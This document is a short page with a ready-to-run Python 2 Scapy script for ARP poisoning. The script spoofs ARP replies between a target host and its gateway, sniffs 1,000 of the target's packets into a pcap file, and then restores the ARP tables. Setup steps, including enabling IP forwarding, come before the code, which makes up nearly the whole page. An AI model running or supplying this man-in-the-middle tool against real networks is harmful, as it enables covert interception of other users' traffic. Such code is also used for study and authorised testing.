ARP poisoning

Can ARP poison two hosts (named as target and gateway). Before run this on linux PC following steps should be done.

1) Install scapy (pip install scapy)

2) Install tcpdump (apt-get install tcpdump)

3) Enable IPv4 network forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward)

Then run script with sudo

from scapy.all import *

import os

import os

import sys

import threading

import signal

interface = 'wlp3s0'

target_ip = '192.168.8.106'

gateway_ip = '192.168.8.1'

packet_count = 1000

# Set interface

conf.iface = interface

# Turn off output

conf.verb = 0

print "Setting up %s" % interface

def get_mac(ip_address):

response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address),timeout=2, retry=10)

for s, r in response:

return r[Ether].src

return None

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:

print 'Failed to get mac'

sys.exit(0)

else:

print "Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:

print 'Failed to get mac'

sys.exit(0)

else:

print " Target %s is at %s" % (target_ip, target_mac)

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

print 'Restoring target...'

send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=gateway_mac),count=5)

send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=target_mac), count=5)

# Signals the main thread kill

os.kill(os.getpid(),signal.SIGINT)

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

poison_target = ARP()

poison_target.op = 2

poison_target.psrc = gateway_ip # setting up source ip of the packet.

poison_target.pdst = target_ip # setting up destination ip of the packet.

poison_target.hwdst = target_mac # setting up destination mac of the packet.

# As a result source mac address will be the mac address of the attacking computer.

poison_gateway = ARP()

poison_gateway.op = 2

poison_gateway.psrc = target_ip

poison_gateway.pdst = gateway_ip

poison_gateway.hwdst = gateway_mac

print 'Begining the ARP pison. CTRL-C to stop'

while True:

try:

send(poison_target)

send(poison_gateway)

time.sleep(100)

except KeyboardInterrupt:

restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

print 'ARP poisoning attack finished'

return

# Start poisoning thread

poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))

poison_thread.start()

try:

print "Starting sniffer for %d packets" % packet_count

bpf_filter = "ip host %s" % target_ip

packets = sniff(count=packet_count,filter= bpf_filter, iface=interface)

wrpcap('arper.pcap', packets)

# Restore the network

restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:

# Restore network

restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

sys.exit(0)